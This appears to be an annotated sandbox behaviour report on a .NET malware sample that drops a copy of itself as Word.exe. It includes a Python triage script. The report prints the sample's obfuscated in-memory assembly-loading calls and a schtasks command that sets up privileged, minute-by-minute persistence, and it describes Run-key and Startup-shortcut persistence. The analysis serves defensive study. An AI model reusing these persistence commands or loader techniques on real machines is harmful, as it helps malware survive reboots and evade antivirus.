Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Note: this is what a Windows PowerShell host loads on start-up plus the pieces the flagged commands need. amsi.dll and wldp.dll are the AMSI and Windows Lockdown Policy hooks PowerShell consults before it runs script (wldp decides the language mode); msisip.dll, wshext.dll, appxsip.dll and opcservices.dll are Authenticode SIP providers pulled in by signature and execution-policy checks; mi.dll, miutils.dll, wmidcom.dll and wbemcomn.dll are the CIM/WMI client, which is how the Defender cmdlets are implemented and so fits the Base64-encoded MpPreference command and the Defender exclusion noted in the signature list.
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll (Task Scheduler COM client; the task registration itself)
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\Word.exe (four Word.exe instances were recorded; each loaded the set below, apphelp.dll only in the first; the per-instance repeats and doubled ucrtbase_clr0400.dll entries are collapsed)
Source: C:\Users\user\AppData\Roaming\Word.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Word.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Word.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Word.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Word.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Word.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Word.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Word.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Word.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Word.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Word.exe | Section loaded: cryptbase.dll
Note: compared with file.exe, the persisted copy loaded only the CLR bootstrap and the CryptoAPI providers (cryptsp/rsaenh/cryptbase) within the recording window; none of the WMI, webcam or network modules appear for it.
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: Word.lnk.0.dr | LNK file: ..\..\..\..\..\Word.exe
Note: the shortcut target is relative, with five parent-directory hops. From the user's Start Menu Startup folder (...\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup) that path resolves to C:\Users\user\AppData\Roaming\Word.exe, the dropped copy listed above, so the .lnk is the start-up persistence for it.
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll (the 64-bit CLR 4 resource library: file.exe runs as a 64-bit .NET Framework 4.x process)
Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR (a CLR header is present, i.e. a managed .NET image)
Source: file.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE (DllCharacteristics 0x8540, the default set the .NET compilers emit; it says nothing about deliberate hardening by the author)
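The module list above is more useful when it is grouped per process and mapped to the capability each telltale library implies. The script below is an added triage example, not part of the Joe Sandbox report: it parses "Section loaded" rows in the raw form the extracted page uses (path and DLL run together, some rows carrying the "Jump to behavior" residue), de-duplicates per process, and annotates the modules that matter. The sample rows are constructed to mirror this report; the capability map is the editor's own and deliberately short.

```python
import re
from collections import OrderedDict

# Constructed sample input shaped like the extracted report rows (not a verbatim
# copy of any live report): process path and module name run together, with the
# "Jump to behavior" UI residue on some rows and a repeated row for a second
# process instance.
SAMPLE_LINES = r"""
Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: avicap32.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: msvfw32.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Users\user\AppData\Roaming\Word.exeSection loaded: cryptsp.dll
"""

# One row: "Source: <image path>[ | ]Section loaded: <module>[Jump to behavior]".
# The module class is greedy, so "amsi.dllJump" backtracks to "amsi.dll".
ROW_RE = re.compile(
    r"^\s*Source:\s*(?P<proc>.+?\.exe)\s*\|?\s*Section loaded:\s*"
    r"(?P<dll>[\w.\-]+\.dll)\s*(?:Jump to behavior)?\s*$",
    re.IGNORECASE,
)

# Modules worth a second look and what their presence implies (editor's map;
# plain Windows runtime libraries are left out because alone they say nothing).
CAPABILITY_HINTS = {
    "amsi.dll":          "AMSI initialised (script or in-memory assembly scan hook)",
    "wbemcomn.dll":      "WMI client (system, AV and VM enumeration)",
    "mi.dll":            "CIM/MI client (WMI via PowerShell cmdlets)",
    "wmidcom.dll":       "WMI DCOM transport",
    "avicap32.dll":      "Video for Windows capture API (webcam)",
    "msvfw32.dll":       "Video for Windows codecs (webcam/video frames)",
    "windowscodecs.dll": "Windows Imaging Component (image encoding, e.g. screenshots)",
    "taskschd.dll":      "Task Scheduler COM client (scheduled-task persistence)",
    "winhttp.dll":       "WinHTTP client (outbound HTTP)",
    "wininet.dll":       "WinINet client (outbound HTTP)",
    "dnsapi.dll":        "DNS resolution",
}


def parse_section_loads(text):
    """Return {process_path: [module, ...]} in first-seen order, dropping exact
    repeats (the report logs a module once per process instance)."""
    loads = OrderedDict()
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue                      # headings, other row types, residue
        modules = loads.setdefault(m.group("proc"), [])
        dll = m.group("dll").lower()
        if dll not in modules:
            modules.append(dll)
    return loads


def capability_hints(loads):
    """Map each process to the (module, hint) pairs its module list implies."""
    out = {}
    for proc, modules in loads.items():
        hits = [(d, CAPABILITY_HINTS[d]) for d in modules if d in CAPABILITY_HINTS]
        if hits:
            out[proc] = hits
    return out


def summarize(text):
    """One triage line per flagged process: image name plus its hints."""
    lines = []
    for proc, hits in capability_hints(parse_section_loads(text)).items():
        image = proc.rsplit("\\", 1)[-1]
        lines.append(f"{image}: " + "; ".join(f"{d} -> {h}" for d, h in hits))
    return lines


if __name__ == "__main__":
    for line in summarize(SAMPLE_LINES):
        print(line)
```

Feed it the whole behaviour section of a report and the output is a per-image list that can be compared across samples; a benign .NET application on the same host will not show avicap32.dll next to wbemcomn.dll and amsi.dll.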

                    Data Obfuscation

Source: file.exe and Word.exe.0.dr (identical code in both), uEQDD3u1jGnJYt3mdJfu6rTjMrGOSgb217iI9FQzr.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_4RAAUk7QYYdq5C5Xl7TeS7uEMYdqQMRzkeS1SsiRmH1sNGBn9MLxdVpF.lfkj5o0jgYcg150GJxwCqLzvOjZiQGcJgoXeuT764dhSh70It70KxS8s,_4RAAUk7QYYdq5C5Xl7TeS7uEMYdqQMRzkeS1SsiRmH1sNGBn9MLxdVpF.jokzdDiPkRx8uIfBrGLWdt6mmQ1BT3zKYWShSFDf7R01EANG6gHc5QsJ,_4RAAUk7QYYdq5C5Xl7TeS7uEMYdqQMRzkeS1SsiRmH1sNGBn9MLxdVpF.FbPaFUO55gCykI9qOTMXgURryVQlpYrZAQlkFSj6qVuIeHiAywz0ZPXo,_4RAAUk7QYYdq5C5Xl7TeS7uEMYdqQMRzkeS1SsiRmH1sNGBn9MLxdVpF.gyEYYIb2Qrx1nY2ULwbNgwV3Vd1cDSTSMzpDv8uEy1eo7htJd4WyIWJa,RLNc59m3K5qBU9nVpBi0AKzQWHnZ4GB7uwf5x7A0VpPRtOmln5U0LHjGRFKVDduY3yBpI1XMO.iQbtMMDbqvw782M0VjWlH0OXdI6OrmMnRHmTbIGY0pzJfs0XOz9ZgACkTrDlsMwqrwokNcYpd()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: file.exe and Word.exe.0.dr (identical code in both), uEQDD3u1jGnJYt3mdJfu6rTjMrGOSgb217iI9FQzr.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{IWNQNfBfJyp9J30iqt4h6bFbIc3K1nHz5RLjnzNHF[2],RLNc59m3K5qBU9nVpBi0AKzQWHnZ4GB7uwf5x7A0VpPRtOmln5U0LHjGRFKVDduY3yBpI1XMO.VkdyIkaSgcgLysr59lJnb5xqWlmjdNthPGEqu6t9D6XLH1PJCHj9C638z06jGOoaAMqntkAzF(Convert.FromBase64String(IWNQNfBfJyp9J30iqt4h6bFbIc3K1nHz5RLjnzNHF[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: file.exe and Word.exe.0.dr (identical code in both), uEQDD3u1jGnJYt3mdJfu6rTjMrGOSgb217iI9FQzr.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { IWNQNfBfJyp9J30iqt4h6bFbIc3K1nHz5RLjnzNHF[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: file.exe and Word.exe.0.dr (identical code in both), uEQDD3u1jGnJYt3mdJfu6rTjMrGOSgb217iI9FQzr.cs | .Net Code: _7jMSGkZwhKQVohw0oZ5Md5Oz1qwwxXktQrdXNNfbB System.AppDomain.Load(byte[])
Source: file.exe and Word.exe.0.dr (identical code in both), uEQDD3u1jGnJYt3mdJfu6rTjMrGOSgb217iI9FQzr.cs | .Net Code: lATz7EGifXIK288ROrMFnjJccSvuS7KesaYcv3Aw2 System.AppDomain.Load(byte[])
Source: file.exe and Word.exe.0.dr (identical code in both), uEQDD3u1jGnJYt3mdJfu6rTjMrGOSgb217iI9FQzr.cs | .Net Code: lATz7EGifXIK288ROrMFnjJccSvuS7KesaYcv3Aw2
Note: NewLateBinding.LateCall is the Visual Basic runtime's late-binding helper (Microsoft.VisualBasic.CompilerServices). Calling it with the member name "Invoke" on a reflected method object performs MethodInfo.Invoke through a string lookup at run time, so the compiled IL never references the invoked method, the reflection call or the target type directly; the leading null in each argument array is the instance parameter, i.e. a static method is being called. The second call site decodes a Base64 blob (Convert.FromBase64String) and passes it through another obfuscated routine, a decryption step given the string-decryption signature above, before handing it on, and the two AppDomain.Load(byte[]) sites load the result as an assembly straight from memory without writing it to disk. This is the standard .NET packer stage, and it is why amsi.dll shows up in the file.exe module list: .NET Framework 4.8 routes byte[] assembly loads through AMSI, so the decrypted stage is the place to collect an AMSI event or a memory dump.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FFAAC36D2A5 pushad ; iretd 7_2_00007FFAAC36D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FFAAC552316 push 8B485F92h; iretd 7_2_00007FFAAC55231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FFAAC35D2A5 pushad ; iretd 11_2_00007FFAAC35D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FFAAC542316 push 8B485F93h; iretd 11_2_00007FFAAC54231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_00007FFAAC35D2A5 pushad ; iretd 14_2_00007FFAAC35D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_00007FFAAC470DD0 pushad ; retf 14_2_00007FFAAC470E0D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_00007FFAAC472A7D push E95E0372h; ret 14_2_00007FFAAC472AC9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_00007FFAAC542316 push 8B485F93h; iretd 14_2_00007FFAAC54231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 16_2_00007FFAAC35D2A5 pushad ; iretd 16_2_00007FFAAC35D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 16_2_00007FFAAC542316 push 8B485F93h; iretd 16_2_00007FFAAC54231B
Note: these hits sit at 0x00007FFA... addresses inside a 64-bit powershell.exe, and pushad (opcode 0x60) has no encoding in 64-bit mode, so what was disassembled here is almost certainly data or JIT-managed memory read as 32-bit code, not deliberate anti-disassembly. They recur at the same offsets in every PowerShell instance and should not be weighted as obfuscation evidence; the .NET late-binding and in-memory loading above is the real finding in this section.
                    Source: file.exe, YUxmYeJDPRnlw3T.cs High entropy of concatenated method names
                    Source: file.exe, taMvE5W0keovYmuuyuBf5WmdOZd5KboRfyckDTKdG.cs High entropy of concatenated method names
                    Source: file.exe, ub99fRJjxxhOnbd1IRYK3hmGl4xhrDhQcSfdxKqEc9S0YSzeggxQAVz5.cs High entropy of concatenated method names
                    Source: file.exe, iAbAE9flz7Sm8xHN82X5gX1oQxkYqqqskhT3TlE2n.cs High entropy of concatenated method names
                    Source: file.exe, RLNc59m3K5qBU9nVpBi0AKzQWHnZ4GB7uwf5x7A0VpPRtOmln5U0LHjGRFKVDduY3yBpI1XMO.cs High entropy of concatenated method names
                    Source: file.exe, nA4euSjsOXy4pNXRxxctUrNzEHkcz7GLZ8jRdQKUWRYwesSxULAuplcxQqEOMiJ619XwMcogZ.cs High entropy of concatenated method names
                    Source: file.exe, mYAr1k08yb0HzmCgp0BEzPHAJWWzMQXamHNPm3NQBAqCoG6fW6xB8GV5ryb6UTU5pbINLp5FL.cs High entropy of concatenated method names
                    Source: file.exe, uEQDD3u1jGnJYt3mdJfu6rTjMrGOSgb217iI9FQzr.cs High entropy of concatenated method names
                    Source: file.exe, iAOKDQGA3p7c29dSlFXyhBvszZmOLR4yirK1dQmhKkiKPA7vvD2EiLbV.cs High entropy of concatenated method names
                    Source: Word.exe.0.dr, YUxmYeJDPRnlw3T.cs High entropy of concatenated method names
                    Source: Word.exe.0.dr, taMvE5W0keovYmuuyuBf5WmdOZd5KboRfyckDTKdG.cs High entropy of concatenated method names
                    Source: Word.exe.0.dr, ub99fRJjxxhOnbd1IRYK3hmGl4xhrDhQcSfdxKqEc9S0YSzeggxQAVz5.cs High entropy of concatenated method names
                    Source: Word.exe.0.dr, iAbAE9flz7Sm8xHN82X5gX1oQxkYqqqskhT3TlE2n.cs High entropy of concatenated method names
                    Source: Word.exe.0.dr, RLNc59m3K5qBU9nVpBi0AKzQWHnZ4GB7uwf5x7A0VpPRtOmln5U0LHjGRFKVDduY3yBpI1XMO.cs High entropy of concatenated method names
                    Source: Word.exe.0.dr, nA4euSjsOXy4pNXRxxctUrNzEHkcz7GLZ8jRdQKUWRYwesSxULAuplcxQqEOMiJ619XwMcogZ.cs High entropy of concatenated method names
                    Source: Word.exe.0.dr, mYAr1k08yb0HzmCgp0BEzPHAJWWzMQXamHNPm3NQBAqCoG6fW6xB8GV5ryb6UTU5pbINLp5FL.cs High entropy of concatenated method names
                    Source: Word.exe.0.dr, uEQDD3u1jGnJYt3mdJfu6rTjMrGOSgb217iI9FQzr.cs High entropy of concatenated method names
                    Source: Word.exe.0.dr, iAOKDQGA3p7c29dSlFXyhBvszZmOLR4yirK1dQmhKkiKPA7vvD2EiLbV.cs High entropy of concatenated method names
                    Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Roaming\Word.exe

                    Boot Survival

                    Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Word" /tr "C:\Users\user\AppData\Roaming\Word.exe"
                    Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Word.lnk
                    Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Word

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\Desktop\file.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\2941D3B83AE7B9AA6CC8 88D9A666AFE4B49FD15B45F1DC568347855CF049E54918D00BAF1610AE750872
                    Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
